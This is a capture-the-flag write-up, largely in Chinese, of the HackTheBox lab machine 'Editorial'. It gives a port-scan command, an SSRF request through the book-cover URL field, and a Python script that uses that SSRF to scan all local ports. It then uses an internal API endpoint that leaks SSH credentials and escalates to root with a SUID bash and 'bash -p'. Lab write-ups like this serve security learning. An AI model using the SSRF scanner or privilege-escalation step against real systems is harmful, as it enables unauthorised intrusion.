Editorial Write Up on HackTheBox

, ,

Before all

很水的一台(?)
但寫腳本開心owo,有練習到常用招
Attacker’s IP : 10.10.14.58
Victim’s IP : 10.10.11.20
Victim’s Host : editorial.htb

Write up

RECON

port scan

command: 

1
rustscan -a 10.10.11.20 --ulimit 5000 -- -sC -sV -Pn

result:
image

很正常地開了 port 22的ssh和port 80的web服務
後面也有做路徑爆破,但沒什麼突破口

Exploit

SSRF

進去http://editorial.htb/upload的url會看到book informatino的頁面,可以讓你傳圖片url他去抓下來

image

封包post出去的內容: 

1
2
3
4
5
6
7
8
9
10
-----------------------------36038148391578841867765834101
Content-Disposition: form-data; name="bookurl"

http://10.10.14.58:9999/NoGameNoLife.png
-----------------------------36038148391578841867765834101
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


-----------------------------36038148391578841867765834101--

嘗試 SSRF掃端口(如果無法抓到那會回傳expected_response那張image)
enum-port.py 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import requests as req
from tqdm import trange, tqdm
import concurrent.futures

url = "http://editorial.htb/upload-cover"
boundary = "14276312323520530593225841561"
expected_response = '/static/images/unsplash_photo_1630734277837_ebe62757b6e0.jpeg'

def make_request(i):
    data = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="bookurl"\r\n\r\n'
        f'http://127.0.0.1:{i}/\r\n'
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="bookfile"; filename=""\r\n'
        'Content-Type: application/octet-stream\r\n\r\n\r\n'
        f'--{boundary}--\r\n'
    )

    headers = {
        'Content-Type': f'multipart/form-data; boundary={boundary}'
    }

    try:
        web = req.post(url, data=data, headers=headers)
        if web.text != expected_response:
            print(web.text, f'port : {i}')
    except req.RequestException as e:
        print(f"Request failed for port {i}: {e}")

def main():
    with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
        list(tqdm(executor.map(make_request, range(1, 65536)), total=65535))

if __name__ == "__main__":
    main()

Result:
image

dump出這坨東西: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
{
  "messages": [
    {
      "promotions": {
        "description": "Retrieve a list of all the promotions in our library.",
        "endpoint": "/api/latest/metadata/messages/promos",
        "methods": "GET"
      }
    },
    {
      "coupons": {
        "description": "Retrieve the list of coupons to use in our library.",
        "endpoint": "/api/latest/metadata/messages/coupons",
        "methods": "GET"
      }
    },
    {
      "new_authors": {
        "description": "Retrieve the welcome message sended to our new authors.",
        "endpoint": "/api/latest/metadata/messages/authors",
        "methods": "GET"
      }
    },
    {
      "platform_use": {
        "description": "Retrieve examples of how to use the platform.",
        "endpoint": "/api/latest/metadata/messages/how_to_use_platform",
        "methods": "GET"
      }
    }
  ],
  "version": [
    {
      "changelog": {
        "description": "Retrieve a list of all the versions and updates of the api.",
        "endpoint": "/api/latest/metadata/changelog",
        "methods": "GET"
      }
    },
    {
      "latest": {
        "description": "Retrieve the last version of api.",
        "endpoint": "/api/latest/metadata",
        "methods": "GET"
      }
    }
  ]
}

其中/api/latest/metadata/messages/authors的path就可以拿到 ssh的帳密了

Previlige Escalation

bash suid???

image

bash -p結束這回合…

After all

水,撫慰今天apcs 觀念題繼續被炸爛的心情
要段考要資格考ㄌqwq
這個賽季應該只能 Silver了ㄅ,下季要努力打(如果沒有衝到其他事情)
image